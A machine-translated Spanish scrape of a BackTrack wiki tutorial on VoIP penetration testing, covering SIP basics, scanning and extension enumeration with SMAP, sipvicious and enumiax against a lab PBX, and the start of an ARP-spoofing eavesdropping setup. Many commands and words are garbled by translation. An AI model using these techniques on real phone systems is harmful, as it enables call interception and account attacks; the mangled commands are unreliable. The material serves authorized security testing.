Pentesting VOIP - BackTrack Linux

Descargar como pdf o txt
Descargar como pdf o txt
Está en la página 1de 41

19/02/13

Pentesting VOIP - BackTrack Linux

Pentesting VOIP
Desde BackTrack Linux
Whitepaper Gratis
www.sourcefire.com/agile
12 Princpios Bsicos para la Seguridad Para el Mundo Real.

Este artculo fue contribuido por NightRang3r.


URL: http://www.back-track.de/index.php?page=team # SMTX
Twitter: ! http://twitter.com/ # / NightRang3r
Email: [email protected]

Contenido
1 Pruebas de Penetracin con BackTrack VOIP
2 Tpico VoIP Topologas
2,1 Self Hosted
2,2 Hosted Services
2.3 Servicio Online SIP
3 Fundamentos SIP
3.1 Las solicitudes SIP / Mtodos
3.1.1 Un Ejemplo SIP "invitar" a la solicitud:
3.2 Las respuestas SIP
3.2.1 Un Ejemplo SIP "Trying" Respuesta:
3,3 SIP llamada entre dos telfonos Ejemplo
4 de ataque
5 Recopilacin de informacin
5,1 SMAP
5.1.1 SMAP uso:
5.1.2 Escaneado de un nico host:
5.1.3 Escaneado de un rango de direcciones IP:
5,2 SIPSAK
5,3 SIPScan
5.3.1 Sip-scan uso:
5.3.2 Escaneo de una subred:
5,4 SVMAP
5.4.1 Escaneo de un rango de direcciones IP:
5.4.2 Habilitacin de las huellas digitales de escaneo
5.5 Extensiones de enumeracin
5.5.1 Svwar
5.5.1.1 Uso:
5.5.1.2 Ejemplo:
5.5.2 Enumiax
6 de monitoreo de trfico y llamadas telefnicas espionaje
6,1 Arp Intoxicacin con arpspoof

www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP

1/41

19/02/13

Pentesting VOIP - BackTrack Linux

6,1 Arp Intoxicacin con arpspoof


6.2 La captura de trfico y espionaje con Wireshark
6,3 voipong
6.3.1 Reproduccin del archivo:
6,4 Vomit
6,5 UCsniff
6.5.1 Monitor de Uso de Modo
6.5.2 Aprendizaje MITM modo de uso
6.5.3 MITM modo de objetivo
6,6 Xplico
6.7 La captura de autenticacin SIP utilizando SIPDump
7 autenticacin Atacar
7,1 Cracking SIP Digest respuesta hashes
7.1.1 SIPCrack uso:
7.1.2 Ataque de diccionario
7.1.2.1 Creacin de un diccionario de seis caracteres numricos:
7.1.2.2 Agrietamiento la respuesta Digest:
7.1.3 ataque de fuerza bruta con John The Ripper
7,2 ataques de fuerza bruta cuentas SIP
8 VLAN Hopping
8,1 VoIP Hopper
8,2 ACE
9 de Denegacin de Servicio
9,1 Inviteflood
9,2 Rtpflood
9,3 Iaxflood
9.4 Desmontaje
10 suplantacin de identificacin de llamadas
11 Uso de Metasploit Atacando VoIP
11,1 Metasploit VoIP Mdulos
11.1.1 Auxiliares
11.1.2 Exploits
11.2 Exploracin de dispositivos habilitados para SIP
11,3 Enumerar nombres de usuario SIP extensions /
11,4 suplantacin de Caller ID auxiliar
11.5 La explotacin de los sistemas de VoIP
12 Palabras de Cierre
13 Sobre el autor
14 Referencias

Pruebas de Penetracin con BackTrack VOIP

VoIP es una tecnologa fascinante que ofrece muchos beneficios y soluciones rentables para la comunicacin. Cada vez m
pequeas empresas y las empresas estn reemplazando sus viejos sistemas de telefona tradicionales con un sin basados
en
PBX VoIP basado puede proporcionar muchas caractersticas, tales como: varias extensiones, identificador de llamadas, c
voz, IVR, capacidades de grabacin de conversaciones, registro, uso con telfonos basados
en hardware o software de bas
conocidos como telfonos de software). Hoy en da hay muchos proveedores de PBX, telfonos IP, servicios de VoIP y e
como: Cisco, Avaya y Asterisk, SNOM, THOMSON ... Con la nueva tecnologa viene un nuevo reto, tanto para la parte d
ofensiva de la seguridad, uno de los " grandes "peligros de las lneas telefnicas tradicionales es que es susceptible a intrus
"escuela vieja" manera de interceptar la lnea telefnica de alguien era conectar fsicamente un pequeo transmisor que se
dentro o fuera de sus instalaciones en alguna parte a lo largo del cable de telfono.
www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP

2/41

19/02/13

Pentesting VOIP - BackTrack Linux

Sistemas de telefona IP tambin son susceptibles a la escucha, hacerlo en un entorno IP es un poco ms difcil de ejecuta
requieren ms los conocimientos y el conjunto adecuado de herramientas. En este artculo no vamos a hablar de un prove
particular o de la tcnica, pero vamos a echar un vistazo a los conceptos y las herramientas disponibles para atacar a nues
disposicin VoIP en Backtrack Linux . El objetivo principal de este artculo es presentar las herramientas y su uso con el
ayudarle a elegir la herramienta adecuada para la situacin correcta. Vamos a examinar algunos vectores de ataque del mu
descubrir cmo BackTrack puede ayudarnos pentesting VoIP, tambin vamos a examinar algunas de las herramientas qu
presentan en BackTrack y su uso.

Tpico VoIP Topologas


Hay varias maneras se puede telefona basada en IP implementadas, estas son algunas topologas comunes y su uso:

Auto Hosted

Una PBX (ie Asterisk) est instalado en el sitio del cliente y conectado a un ISP o proveedor de servicios de telefona PST
de una troncal SIP / PRI, el trfico de VoIP fluye a travs de una VLAN dedicada.

Visio diagrama de Amir Avraham


www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP

3/41

19/02/13

Pentesting VOIP - BackTrack Linux

Servicios de Alojamiento

No hay necesidad de un PBX en el sitio. Slo un switch, un router, telfonos IP y una conexin a la central a travs de pro
servicios de Internet o IP / VPN conexin, cada telfono se configura con informacin de la cuenta SIP.

Servicio en lnea SIP

Servicios como sipme.me proporciona una aplicacin para PC o los telfonos inteligentes y una cuenta gratuita sorbo, que
precios ms bajos para las llamadas internacionales y las llamadas gratuitas entre los usuarios de los servicios mediante la
de un nmero de telfono mvil a cada suscriptor.

www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP

4/41

19/02/13

Pentesting VOIP - BackTrack Linux

SIP Basics

El SIP (Session Initiation Protocol) papel es configurar, cancelar o modificar una voz o una videollamada concentrndose
el trfico de video soportado por un protocolo como RTP (Protocolo de transporte en tiempo real). SIP es un protocolo de
aplicacin que utiliza UDP para el transporte (TCP y SCTP se puede utilizar tambin).
SIP normalmente utiliza los puertos 5060 TCP o UDP para sealizacin cifrada o 5061 para el transporte cifrado
TLS.

SIP es un protocolo basado en ASCII que tiene algunos elementos similares, como en el protocolo HTTP utilizando una pe
respuesta modelo. Al igual que una peticin HTTP de un navegador de una solicitud de cliente SIP se realiza mediante un
agente de usuario y un mtodo / solicitud. SIP utiliza el correo electrnico como formato de direcciones: usuario / telfon
dominio / IP es un tpico URI SIP se ve as:
sip: [email protected], sip: [email protected], sip: [email protected]: 5060

De acuerdo con la solicitud presentada por el cliente ser recibido una respuesta con un cdigo de estado o de error, las ta
siguientes se describen las peticiones y las respuestas disponibles en el protocolo SIP.

Pide SIP / Mtodos


Solicitar
Descripcin
INVITAN Se utiliza para invitar y dar cuenta de participar en una sesin de llamada.
ACK
Acusar recibo de una peticin INVITE.
CANCELAR
Cancelar una solicitud pendiente.
www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP

5/41

19/02/13

Pentesting VOIP - BackTrack Linux

REGISTRO
Registrar el usuario con un servidor SIP.
OPCIONES Muestra informacin acerca de las capacidades de una persona que llama.
BYE
Termina una sesin entre dos usuarios en una llamada.
Indica que el destinatario (identificado por la URI de la solicitud)
CONSULTE

debe contactar a un tercero que utilice la informacin de contacto


proporcionada en la solicitud.
El mtodo SUBSCRIBE se utiliza para solicitar el estado actual y

SUSCRBETE

actualizaciones de estado desde una distancia


nodo.
El mtodo NOTIFY se utiliza para notificar a un nodo SIP que un evento

NOTIFICAR

que ha sido solicitada por un mtodo SUBSCRIBE antes ha


ocurrido.

Un ejemplo SIP "INVITE" Solicitud:


INVITAN SIP: [email protected] SIP/2.0
Via: SIP/2.0/UDP 192.168.1.102; rport; sucursal = z9hG4bKvbxaoqar
Max-Delanteros: 70
A:
De: "NightRanger" ; Tag = eihgg
Call-ID: hfxsabthoymshub @ retroceder
CSeq: 649 INVITE
Contacto:
Content-Type: application / sdp
Allow: INVITE, ACK, BYE, CANCEL, OPTIONS, PRACK, CONSULTE, NOTIFY, SUBSCRIBE, INFO, MESSAGE
Soportados: sustituye, norefersub, 100rel
User-Agent: Twinkle/1.2
Content-Length: 310

SIP Respuestas
Respuesta
1xx

Descripcin
Respuestas informativos, solicitud recibida y ser
procesada.
Respuestas exitosas La accin fue recibida con xito,

2xx

comprendido y aceptado.

3xx

Respuestas de redireccin
Solicitar respuestas fracaso de la peticin es sintcticamente incorrecta o

4xx
www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP

no se pueden cumplir en el servidor.


6/41

19/02/13

Pentesting VOIP - BackTrack Linux

Las respuestas del servidor falla, el servidor incumplido una de las


5xx

aparentemente solicitud vlida.


Respuestas globales fracaso de la solicitud no puede cumplirse en cualquier

6xx

servidor.

Un ejemplo SIP "Trying" Respuesta:

Tratando SIP/2.0 100


Via: SIP/2.0/UDP 192.168.1.102; sucursal = z9hG4bKpmphujka, recibido = 192.168.1.102; rport = 5060
De: "NIghtRanger" ; Tag = eihgg
A:
Call-ID: hfxsabthoymshub @ retroceder
CSeq: 650 INVITE
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, CONSULTE, suscribir, NOTIFIQUE
Compatible con: sustituye
Contacto:
Content-Length: 0

SIP llamada entre dos telfonos Ejemplo

El telfono que llama enva una invitacin.


El telfono llamado devuelve una respuesta de 100 (Tratar).
El telfono llamado entonces comienza a sonar y enva una respuesta de 180 (Ringing).
Cuando la persona toma el telfono el telfono llama enva una respuesta de 200 (OK).
El telfono que llama enva una respuesta ACK.
La conversacin se inicia a travs de RTP.
Cuando la persona que llama cuelga el telfono una peticin BYE es enviada.
www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP

7/41

19/02/13

Pentesting VOIP - BackTrack Linux

El telfono que llama responde con 200 (OK).

De ataque
Antes de empezar con las herramientas que vamos a echar un vistazo a algunos tipos de ataque comunes VoIP:
Recopilacin de informacin, Huella y recuento.
Seguimiento de llamadas de trfico y escuchas telefnicas.
Atacar autenticacin.
VLAN salto.
Denegacin de servicio / Inundaciones.
Suplantacin de identificacin de llamadas.

Con el fin de probar las herramientas que ha configurado un sistema de Trixbox PBX y creado 6 extensiones. Me va a util
telfonos de software, es un cliente basado en Linux llamado Twinkle y el segundo es un cliente basado en Windows llam
Me va a utilizar la versin ltima y ms grande de Backtrack Linux que es R2. Usted puede encontrar la mayora de las
herramientas de ataque de VoIP en Backtrack bajo el directorio "/ pentest / voip /" directorio:

root @ bt: ~ # cd / pentest / voip /


root @ bt :/ pentest / voip #

O simplemente puede navegar a travs del men de KDE para el "Backtrack" "Voz sobre IP" sub-mens:

www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP

8/41

19/02/13

Pentesting VOIP - BackTrack Linux

Recopilacin de informacin

Esta fase es donde nos reunimos informacin acerca de la topologa, servidores y clientes para obtener informacin tanto
podamos a fin de lanzar un ataque exitoso. Lo que nos interesa es la bsqueda de hospederos vivos, el tipo y la versin PB
servidores VoIP / gateways, clientes (hardware y software) los tipos y versiones, etc ... En vez de enumerar los nombres d
vamos a enumerar las extensiones SIP. Echemos un vistazo a algunas de las herramientas que est disponible en Backtrac
ayuden a encontrar, identificar y enumerar los dispositivos de VoIP habilitadas.

SMAP

Backtrack incluye una gran herramienta llamada SMAP , que es un escner simple para dispositivos con capacidad SIP S
enva de varias solicitudes SIP en espera de respuestas de SIP habilitado router DSL, apoderados y agentes de usuario.
Se podra considerar un mash up de NMAP y SIPSAK.
SMAP uso:

root @ bt :/ pentest / VoIP / SMAP # . / SMAP


SMAP 0.6.0 http://www.wormulon.net/
uso: SMAP [Opciones]
-H: esta ayuda
-D: aumentar la depuracin
-O: activar huellas dactilares
-O: permitir una mayor toma de huellas dactilares detallado
-L: el modo de aprendizaje de huellas dactilares
-T: transporte TCP
-U: transporte UDP (por defecto
-P0: Tratar a todos los hosts en Internet - skip anfitrin descubrimiento
-P : Puerto de destino
-R : Mensajes al lmite de velocidad de segundo
-D : Dominio SIP para usar sin provocar sip:
-W : Tiempo de espera en milisegundos

Escaneado de un nico host:

root @ bt :/ pentest / VoIP / SMAP # . / SMAP 192.168.1.104


SMAP 0.6.0 http://www.wormulon.net/
192.168.1.104: accesible ICMP, SIP habilitado
1 host escaneado, 1 alcanzable ICMP, 1 con capacidad SIP (100,0%)

Escaneado de un rango de direcciones IP:

root @ bt :/ pentest / VoIP / SMAP # . / 192.168.1.130/24 SMAP


SMAP 0.6.0 http://www.wormulon.net/
192.168.1.20: accesible ICMP, SIP habilitado
192.168.1.22: accesible ICMP, SIP habilitado
192.168.1.0: ICMP inalcanzable, SIP desactivado
192.168.1.1: ICMP inalcanzable, SIP desactivado
192.168.1.2: ICMP inalcanzable, SIP desactivado
192.168.1.3: ICMP inalcanzable, SIP desactivado

www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP

9/41

19/02/13

Pentesting VOIP - BackTrack Linux

---- EDIT --192.168.1.250: ICMP inalcanzable, SIP desactivado


192.168.1.251: ICMP inalcanzable, SIP desactivado
192.168.1.252: ICMP inalcanzable, SIP desactivado
192.168.1.253: ICMP inalcanzable, SIP desactivado
192.168.1.254: ICMP inalcanzable, SIP desactivado
192.168.1.255: ICMP inalcanzable, SIP desactivado
256 hosts escaneados, 7 alcanzables ICMP, 2 con capacidad SIP (0,8%)

Ahora que hemos identificado a los anfitriones con capacidad SIP podemos utilizar SMAP de la huella digital del tipo clie
servidor y versin:
root @ bt :/ pentest / VoIP / SMAP # . / SMAP-O 192.168.1.104
SMAP 0.6.0 http://www.wormulon.net/
192.168.1.104: accesible ICMP, SIP habilitado
mejor estimacin (70% seguro) huella digital:
Asterisk PBX SVN-r56579 troncoUser-Agent: Asterisk PBX
1 host escaneado, 1 alcanzable ICMP, 1 con capacidad SIP (100,0%)

En el caso de SMAP no poda nuestra huella anfitrin se utiliza el argumento-l para ponerlo en modo de aprendizaje para
proporcionar alguna informacin til:
root @ bt :/ pentest / VoIP / SMAP # . / SMAP-l 192.168.1.104
SMAP 0.6.0 http://www.wormulon.net/
AVISO: test_accept: "Accept: application / sdp"
AVISO: test_allow: "Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, CONSULTE, suscribir, NOTIFY"
AVISO: test_supported: "Con el apoyo: sustituye"
AVISO: test_via: capitalizacin de transporte: 2
AVISO: test_via: "sucursal; alias; recibido; rport"
AVISO: test_via: Por favor, aadir cmpstr nuevo
AVISO: test_via: capitalizacin de transporte: 2
192.168.1.104: accesible ICMP, SIP habilitado
mejor estimacin (70% seguro) huella digital:
Asterisk PBX SVN-r56579 troncoHUELLA informacin:
newmethod = 501
accept_class = 2
allow_class = 201
supported_class = 8
via_class = 2
hoe_class = ignorar
options = 200
brokenfromto = 404
PRACK = 481
mesa de ping = 501
invitar = 200
User-Agent: Asterisk PBX
1 host escaneado, 1 alcanzable ICMP, 1 con capacidad SIP (100,0%)

Otra caracterstica til de SMAP es el argumento-d, que permite la salida de depuracin para verbosidad intenta utilizar el
con l a ver el proceso de toma de huellas dactilares en los detalles.
root @ bt :/ pentest / VoIP / SMAP # . / SMAP-d 192.168.1.104
SMAP 0.6.0 http://www.wormulon.net/
DEBUG: IP local: 212.235.66.182
DEBUG: IP local: 212.235.66.182
DEBUG: bind () con xito
DEBUG: RAW socket abierto
DEBUG: pasar de 1 a S_START S_PING
DEBUG: Responder ICMP Echo error
DEBUG: 192.168.1.104 / 1 peticin: solicitud SIP OPTIONS (vlido)
DEBUG: respuesta pertenece a la tarea 1 (192.168.1.104)
DEBUG: ACK: ACK sip: localhost SIP/2.0
Via: SIP/2.0/UDP 212.235.66.182:12345; sucursal = z9hG4bK.56689, alias, recibido = 192.168.1.105; rport = 5060
De: ; Tag = 6b9ae50e67345d3b
A: ; Tag = as14262fec
Call-ID: [email protected]
CSeq: ACK 23915
Content-Length: 0

www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP

10/41

19/02/13

Pentesting VOIP - BackTrack Linux

User-Agent: SMAP 0.6.0


--- Fin del ACK 192.168.1.104: accesible ICMP, SIP habilitado
DEBUG: destruir la tarea 1

1 host escaneado, 1 alcanzable ICMP, 1 con capacidad SIP (100,0%)

SIPSAK

SIPSAK se utiliza para probar las aplicaciones habilitadas SIP y dispositivos que utilizan el mtodo de solicitud nica opci
Podemos usarlo para huellas digitales y enumeracin. Usted no encontrar SIPSAK en el directorio "/ pentest / voip /" dire
puede ejecutar desde cualquier lugar simplemente escribiendo SIPSAK.

root @ bt: ~ # SIPSAK


0.9.6 SIPSAK por Nils Ohlmeier
Copyright (C) 2002-2004 FHG Fokus
Copyright (C) 2004-2005 Ohlmeier Nils
informar de los errores a [email protected]
disparar: SIPSAK [-f archivo] [-L]-s SIPURI
trace: SIPSAK-T-s SIPURI
usrloc: SIPSAK-U [-I | M] [-b NMERO] [-e NMERO] [-x NMERO] [-z NMERO]-s SIPURI
usrloc: SIPSAK-I | M [-b NMERO] [-e NMERO]-s SIPURI
usrloc: SIPSAK-U [-C SIPURI] [-x NMERO]-s SIPURI
mensaje: SIPSAK-M [B-STRING] [-O CADENA] [-c SIPURI]-s SIPURI
inundacin: SIPSAK-F [-e NMERO]-s SIPURI
azar: SIPSAK-R [-t NMERO]-s SIPURI
parmetro adicional en cada modo:
[-A CONTRASEA] [-d] [-i] [-H HOSTNAME] [-l PUERTO] [-m nmero] [-n] [-N]
[PORT-r] [-v] [-V] [-w]
-H muestra este mensaje de ayuda
V-string versin copias slo
-F file El archivo que contiene el mensaje de SIP para enviar
usar - para la entrada estndar
-L desactivar CR (\ r) insercin en los archivos
-S SIPURI la URI del servidor de destino en forma
sip: [usuario @] nombre_servidor [: puerto]
-T activa el modo de traceroute
-U activa el modo de usrloc
-I simula algunas llamadas exitosas con ella misma
-M enva mensajes a s mismo
-C SIPURI utilizar el URI como contacto en REGISTRO
-B Nmero del apndice nmero inicial para el nombre de usuario (por defecto: 0)
-E NUMERO el numer de finalizacin del apndice al nombre de usuario
-O nmero de nmero de dormir ms antes de enviar la siguiente solicitud
-X NMERO expira el campo de encabezado valor (por defecto: 15)
-Z NMERO activa aleatoriamente eliminacin de las consolidaciones de usuario
-F activa el modo de inundacin
-R activa los modues aleatorios (peligroso)
NMERO-t el nmero mximo de caracteres destrozado en modo aleatorio
(Por defecto: duracin peticin)
-L El puerto local para usar (por defecto: ninguno)
-R PORT el puerto remoto (por defecto: 5060)
-P objetivo peticin HOSTNAME (proxy saliente)
HOSTNAME-H sobrescribe el nombre de host local en todas las cabeceras
-M NUMERO el valor del campo de encabezado max-forwards
-N usar FQDN en lugar de direcciones IP en el Via-Line
-I desactivar la insercin de un Via-Line
: La contrasea para la autenticacin de contrasea
(Si la contrasea se omite = "")
-U username STRING autenticacin
-D ignorar redireccionamientos
-V v cada uno produce ms verbosidad (mx. 3)
-W IP extracto de la advertencia en respuesta
-G cadena de reemplazo para una marca especial en el mensaje
-G activa sustitucin de variables
-N devuelve cdigos de salida compatible con Nagios
-Q bsqueda STRING por una expresin regular en las respuestas y el error de retorno
en caso de fallo
-W NMERO Nagios retorno de advertencia si retransmisin> Nmero
B-STRING enviar un mensaje con la cadena como cuerpo
-O CADENA Content-Disposition valor
-P Nmero de serie de procesos para iniciar
-A NUMERO nmero de ejecuciones de pruebas e imprimir slo horarios
-S utilizan el puerto mismo para recibir y enviar
-C SIPURI utilizar el URI como en De MENSAJE
-D NMERO multiplicador de tiempo de espera para las transacciones INVITE
y medios de transporte confiables (por defecto: 64)
-E STRING especificar transporte que se utilizar
-J STRING agrega cabeceras adicionales a la solicitud

He aqu un ejemplo de uso de SIPSAK a un dispositivo de huella digital con capacidad SIP Podemos ver en el resultado de
dispositivo que consulta es un Audiocodes
www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP

MP-114 FXS gateway.

11/41

19/02/13

Pentesting VOIP - BackTrack Linux

dispositivo que consulta es un Audiocodes MP-114 FXS gateway.


root @ bt: ~ # SIPSAK-vs-s sip: 192.168.1.221
mensaje recibido:
SIP/2.0 200 OK
Via: SIP/2.0/UDP 127.0.1.1:51601; sucursal = z9hG4bK.18a1b21f; rport, alias
De: sip: [email protected]: 51601; tag = 97ac9e5
A: sip: 192.168.1.221; tag = 1c1785761661
Call-ID: [email protected]
CSeq: 1 OPCIONES
Contacto:
Compatible con: em, 100rel, temporizador, sustituye, camino, recursos prioridad
Permitir: REGISTER, OPTIONS, INVITE, ACK, CANCEL, BYE, notificar, PRACK, CONSULTE, INFO, SUBSCRIBE, UPDATE
Servidor: Audiocodes-SIP-Gateway-MP-114 FXS/v.5.40A.040.005
X-Recursos: telchs = 4/0; mediachs = 0/0
Accept: application / sdp, application / simple-mensaje-resumen, el mensaje / sipfrag
Content-Type: application / sdp
Content-Length: 343
v=0
o = 1785763980 1785763858 AudiocodesGW EN IP4 192.168.1.221
s = Telfono-Call
C = EN IP4 192.168.1.221
t=00
m = audio 6000 RTP / AVP 18 8 0 127
a = rtpmap: 18 G729/8000
un fmtp =: 18 = no annexb
a = rtpmap: 8 PCMA/8000
un rtpmap =: 0 PCMU/8000
a = rtpmap: 127 telephone-event/8000
un fmtp =: 127 0-15
un ptime =: 20
un sendrecv =
una RTCP =: 6001 EN IP4 192.168.1.221

** Responder recibido despus de 67,923 ms **


SIP/2.0 200 OK
final recibida

SIPScan
Sip-Scan es un escner simple para saborear hosts habilitados para que pueda escanear un solo host o una subred complet
Sip-scan uso:

root @ bt :/ pentest / voip / sipscan # / sip exploracin--. ayudar


. / Sip-scan versin [unknown] llamado Getopt :: std :: getopts (versin 1,05),
funcionando bajo la versin Perl 5.10.0.
Uso: sip-scan [opciones]
-V Ser detallado.
-I ip | si Interface / IP SIP-headers (por defecto: IP desde ppp0)
-P puerto puerto remoto para escanear. (Por defecto: 5060)
-L puerto local origen de los paquetes. (Por defecto: 5060)
-Dn [p] Espere n ms despus de cada paquete enviado (por defecto: 50ms) o si 'p' es
dado, enve n paquetes por segundo (por defecto: 20)
-Wn Wait n ms para las respuestas restantes (por defecto: 2000 ms)
Red de especificaciones contiene el comodn * nm o rangos.

Escaneo de una subred:

root @ bt :/ pentest / voip / sipscan # . / sip-scan-i eth0 192.168.1.1-254


192.168.1.20: Grandstream HT-502 V1.2A 1.0.1.35
192.168.1.21: Grandstream HT-502 V1.2A 1.0.1.35
192.168.1.22: Asterisk PBX
192.168.1.104: Asterisk PBX
192.168.1.128: FreeSWITCH-mod_sofia/1.0.trunk-16055
192.168.1.174: Grandstream HT-502 V1.2A 1.0.1.35
192.168.1.175: Asterisk PBX 1.6.0.9-samy-r27
192.168.1.219: "Exelmind de control de llamada Switch (CCS)"
192.168.1.248: MailVision HostLynx/2.1 'GA'

www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP

12/41

19/02/13

Pentesting VOIP - BackTrack Linux

192.168.1.248: MailVision HostLynx/2.1 'GA'

SVMAP

SVMAP forma parte de un conjunto de herramientas llamado sipvicious y es mi favorito escner de eleccin Puede ser ut
escanear identificar y huella digital de una sola direccin IP o un rango de direcciones IP. Svmap permite especificar el m
peticin que est siendo usado para la digitalizacin, el mtodo predeterminado es OPCIONES, ofrece depuracin y opcio
verbosidad e incluso permite escanear los registros SRV de SIP en el dominio de destino. Usted puede utilizar el /. svmap
todos los argumentos disponibles

root @ bt :/ pentest / voip / sipvicious # . / svmap.py


Uso: svmap.py [opciones] host1 host2 hostrange
ejemplos:
svmap.py 10.0.0.1-10.0.0.255 \
> 172.16.131.1 sipvicious.org/22 10.0.1.1/24 \
> 1.1.1.1-20 1.1.2-20. * 4.1. *. *
svmap.py-s session1 - aleatorizar 10.0.0.1 / 8
svmap.py - resume session1-v
svmap.py-p5060-5062-m 10.0.0.3-20 INVITAR

Escaneo de un rango de direcciones IP:

root @ bt :/ pentest / voip / sipvicious # . / svmap.py 192.168.1.1-254


| SIP Device | Agente de usuario | Huella |
-------------------------------------------------- | 192.168.1.104:5060 | Asterisk PBX | disabled |
| 192.168.1.103:5060 | Twinkle/1.4.2 | disabled |

Habilitar exploracin huellas digitales

root @ bt :/ pentest / voip / sipvicious # . / svmap.py 192.168.1.1-254 - fp

www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP

13/41

19/02/13

Pentesting VOIP - BackTrack Linux

Extensiones Enumeracin

Enumeracin de extensin puede ayudar a un atacante mediante la bsqueda de extensiones vlidas en un sistema de VoI
puede conducir a un ataque de fuerza bruta sobre las cuentas SIP. Enumeracin obras de ampliacin por los errores que e
devueltos por los mtodos solicitudes SIP REGISTER como, opciones y INVITAR
Svwar

Svwar es tambin una herramienta de la suite sipvicious permite enumerar las extensiones utilizando una gama de extensio
utilizar un archivo de diccionario svwar apoya todos los de los tres mtodos de enumeracin de extensin como se ha men
anteriormente, el mtodo por defecto para la enumeracin es registrarse.
Uso:

root @ bt :/ pentest / voip / sipvicious # . / svwar.py


Uso: svwar.py [opciones] destino
ejemplos:
svwar.py-e100-999 10.0.0.1
svwar.py-d dictionary.txt 10.0.0.2

Ejemplo:

root @ bt :/ pentest / voip / sipvicious # . / 192.168.1.104 svwar.py-e100-400


| Extensin | Autenticacin |
-----------------------------| 201 | reqauth |
| 200 | reqauth |
| 203 | reqauth |
| 202 | reqauth |
| 303 | reqauth |
| 305 | reqauth |

Svwar ha identificado todas las extensiones que he creado en mi servidor Trixbox. Puede especificar otro mtodo sorbo u
m-argumento, tambin se puede aadir-v o t-vv para mostrar ms informacin.
root @ bt :/ pentest / voip / sipvicious # . / svwar.py-e100-400 192.168.1.104-m INVITAR-v
INFO: TakeASip: tratar de obtener ip auto .. podra tomar un tiempo
INFO: root: enciendan sus motores
INFO: TakeASip: Ok dispositivo SIP encontrado
INFO: TakeASip: extension '200 'existe - requiere autenticacin
INFO: TakeASip: extension '201 'existe - requiere autenticacin
----- Editar ---INFO: TakeASip: extension '203 'existe - requiere autenticacin
INFO: TakeASip: extension '303 'existe - requiere autenticacin
INFO: TakeASip: extension '303 'existe - requiere autenticacin
INFO: TakeASip: extension '305 'existe - requiere autenticacin
INFO: root: contamos con 6 extensiones
| Extensin | Autenticacin |
-----------------------------| 201 | reqauth |
| 200 | reqauth |
| 203 | reqauth |
| 202 | reqauth |
| 303 | reqauth |
| 305 | reqauth |
INFO: root: Tiempo total: 0:00:21.944731

www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP

14/41

19/02/13

Pentesting VOIP - BackTrack Linux

Enumiax

Enumiax se utiliza para enumerar los nombres de usuario de Asterisk protocolo de Cambio. Permite un ataque de dicciona
nombre de usuario secuencial Adivinar

root @ bt :/ pentest / voip / enumiax # . / enumiax


enumIAX 1,0
Dustin D. Trammell
Uso: enumiax [opciones] destino
opciones:
-D
Diccionario ataque con expediente
-I
Intervalo para auto-save (nmero de operaciones, por defecto 1000)
-M # nombre de usuario mnima (en caracteres)
-M # nombre de usuario mximo (en caracteres)
-R # lmite de velocidad de las llamadas (en microsegundos)
-S
Leer el estado de sesin de archivo de estado
-V verbosidad Incremento (repeticin de verbosidad adicional)
-V Imprimir informacin de versin y salir
-H help Imprimir / uso de la informacin y de salida
root @ bt :/ pentest / voip / enumiax # . / enumiax-v-M3-M3 192.168.1.104
enumIAX 1,0
Dustin D. Trammell
Objetivo adquirido: 192.168.1.104
Conexin a 192.168.1.104 a travs de UDP en el puerto 4569 ...
Iniciar el proceso de enumeracin en: Jue 05 de febrero 2011 13:04:18
Ahora trabaja en 3 nombres de usuario de caracteres ...
#################################
Tratando nombre de usuario: "000"
#################################
Tratando nombre de usuario: "001"
#################################
Tratando nombre de usuario: "002"
#################################
Tratando nombre de usuario: "003"
#################################
Tratando nombre de usuario: "004"
#################################
Tratando nombre de usuario: "005"
#################################
Tratando nombre de usuario: "006"
#################################
Tratando nombre de usuario: "007"
#################################
Tratando nombre de usuario: "008"
#################################
...
root @ bt :/ pentest / voip / enumiax # . / enumiax dict-d-v 192.168.1.104
enumIAX 1,0
Dustin D. Trammell
Objetivo adquirido: 192.168.1.104
Conexin a 192.168.1.104 a travs de UDP en el puerto 4569 ...
Iniciar el proceso de enumeracin en: Jue 05 de febrero 2011 13:02:39
#################################
Tratando de usuario: "guest"
#################################
Tratando nombre de usuario: "iaxtel"
#################################
Tratando nombre de usuario: "iaxtel2"
#################################
Tratando de usuario: "100"
#################################
Tratando nombre de usuario: "101"
#################################
Tratando nombre de usuario: "200"
#################################
Tratando nombre de usuario: "201"
#################################
Tratando de usuario: "202"
#################################
Tratando nombre de usuario: "203"
Fin del archivo de diccionario alcanzado, salir.

Monitoreo de trfico y llamadas telefnicas espionaje


Supervisar el trfico de VoIP puede permitir a un atacante capturar las solicitudes de SIP y RTP datos enviados desde los
servidor y viceversa. Se puede servir a dos tipos de ataque:
www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP

15/41

19/02/13

Pentesting VOIP - BackTrack Linux

La captura de autenticacin SIP (que ms tarde se discuta este tema en la seccin de autenticacin atacando).
Usuarios escuchas ilegales llamadas telefnicas.
A efectos de clculo se utilizar el siguiente escenario:

Para este tipo de ataque que tendr que realizar un hombre en medio del ataque que se requieren los siguientes pasos:
Arp intoxicacin / spoofing
Oler el trfico
Decodificacin RTP datos a un archivo de audio.

Envenenamiento ARP mediante arpspoof

Antes de que podamos comenzar a rastrear el trfico tendremos que nuestro veneno arp switch / puerta de enlace, vamos
una herramienta llamada "arpspoof", que se encuentra en "/ usr / sbin / arpspoof" carpeta en Backtrack, de hecho slo p
invocarlo desde cualquier lugar, escribiendo: arpspoof Antes de poder utilizar arpspoof tendremos que activar el reenvo I

root @ bt: ~ # echo 1> / proc/sys/net/ipv4/ip_forward

Sintaxis arpspoof debera tener el siguiente aspecto:


root @ bt: ~ # arpspoof
Versin: 2,4
Uso: arpspoof [-i interface] [-t target] anfitrin

www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP

16/41

19/02/13

Pentesting VOIP - BackTrack Linux

